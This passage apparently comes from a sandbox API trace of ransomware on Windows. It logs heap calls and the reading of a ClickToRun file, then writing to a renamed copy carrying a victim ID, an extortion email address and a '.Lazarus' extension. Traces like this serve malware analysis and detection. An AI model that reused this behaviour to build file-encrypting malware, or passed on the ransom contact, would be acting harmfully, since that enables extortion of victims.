lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0095.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0095.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0095.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0095.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0095.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d660 | out: hHeap=0x20000) returned 1 [0095.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0095.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b9c8 | out: hHeap=0x20000) returned 1 [0095.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0095.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0095.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0095.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0095.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0095.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0095.499] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.499] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.499] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b64383, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b64383, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xbd783a00, ftLastWriteTime.dwHighDateTime=0x1d0d7e5, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x1, dwReserved1=0x0, cFileName="i640.hash", cAlternateFileName="I640~1.HAS")) returned 1 [0095.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0095.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0095.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0095.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0095.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0095.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0095.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0095.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0095.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0095.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0095.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0095.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0095.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0095.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0095.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0095.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0095.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0095.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0095.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0095.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0095.500] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.500] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.500] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.500] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0095.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0095.500] AreFileApisANSI () returned 1 [0095.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash", lpUsedDefaultChar=0x0) returned 68 [0095.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0095.500] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.500] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0095.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0095.501] AreFileApisANSI () returned 1 [0095.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0095.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82208 [0095.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x82208, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash") returned 68 [0095.501] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0095.501] GetFileType (hFile=0x33c) returned 0x1 [0095.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82208 | out: hHeap=0x20000) returned 1 [0095.501] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0095.501] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0095.502] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0095.502] CloseHandle (hObject=0x33c) returned 1 [0095.502] AreFileApisANSI () returned 1 [0095.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0095.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82cb8 [0095.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x82cb8, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash") returned 68 [0095.502] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0095.502] GetFileType (hFile=0x33c) returned 0x1 [0095.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82cb8 | out: hHeap=0x20000) returned 1 [0095.502] CloseHandle (hObject=0x33c) returned 1 [0095.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0095.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0095.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0095.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0095.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0095.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0095.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0095.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0095.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0095.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0095.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0095.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0095.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0095.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0095.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0095.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0095.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0095.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0095.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0095.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0095.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0095.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0095.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0095.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0095.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0095.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0095.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0095.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0095.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0095.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0095.504] AreFileApisANSI () returned 1 [0095.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0095.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82e68 [0095.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x82e68, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash") returned 68 [0095.504] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b64383, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b64383, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xbd783a00, ftLastWriteTime.dwHighDateTime=0x1d0d7e5, nFileSizeHigh=0x0, nFileSizeLow=0x66)) returned 1 [0095.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82e68 | out: hHeap=0x20000) returned 1 [0095.504] AreFileApisANSI () returned 1 [0095.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0095.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0095.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0095.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0095.504] GetLastError () returned 0x0 [0095.504] SetLastError (dwErrCode=0x0) [0095.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df50 [0095.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x49ca0 [0095.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bd10 [0095.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0095.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d648 [0095.505] GetLastError () returned 0x0 [0095.505] SetLastError (dwErrCode=0x0) [0095.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0095.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0095.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x77) returned 0x69db0 [0095.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0095.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x55f20 [0095.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0095.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0095.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0095.505] AreFileApisANSI () returned 1 [0095.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 130 [0095.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x104) returned 0x8c058 [0095.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x8c058, cchWideChar=130 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 130 [0095.505] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0095.506] GetFileType (hFile=0x33c) returned 0x1 [0095.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c058 | out: hHeap=0x20000) returned 1 [0095.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0095.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0095.506] AreFileApisANSI () returned 1 [0095.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0095.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82058 [0095.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x82058, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash") returned 68 [0095.506] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0095.506] GetFileType (hFile=0x418) returned 0x1 [0095.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82058 | out: hHeap=0x20000) returned 1 [0095.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0095.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0095.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0095.506] GetLastError () returned 0x0 [0095.507] SetLastError (dwErrCode=0x0) [0095.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0095.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0095.507] GetLastError () returned 0x0 [0095.507] SetLastError (dwErrCode=0x0) [0095.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0095.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0095.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0095.507] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f030*=0x66, lpOverlapped=0x0) returned 1 [0095.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0095.647] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0095.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0095.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x90450 [0095.656] GetLastError () returned 0x0 [0095.656] SetLastError (dwErrCode=0x0) [0095.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6) returned 0x7cf20 [0095.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6a8 [0095.657] GetLastError () returned 0x0 [0095.657] SetLastError (dwErrCode=0x0) [0095.657] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0095.657] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327ef70*=0x70, lpOverlapped=0x0) returned 1 [0095.658] GetLastError () returned 0x0 [0095.658] SetLastError (dwErrCode=0x0) [0095.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0095.658] GetLastError () returned 0x0 [0095.658] SetLastError (dwErrCode=0x0) [0095.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0095.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0095.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0095.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0095.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0095.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x90450 | out: hHeap=0x20000) returned 1 [0095.658] CloseHandle (hObject=0x33c) returned 1 [0095.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0095.659] CloseHandle (hObject=0x418) returned 1 [0095.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0095.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0095.659] AreFileApisANSI () returned 1 [0095.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0095.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82cb8 [0095.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x82cb8, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash") returned 68 [0095.659] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0095.660] GetFileType (hFile=0x418) returned 0x1 [0095.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82cb8 | out: hHeap=0x20000) returned 1 [0095.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x90450 [0095.661] GetLastError () returned 0xb7 [0095.661] SetLastError (dwErrCode=0xb7) [0095.661] WriteFile (in: hFile=0x418, lpBuffer=0x327de50*, 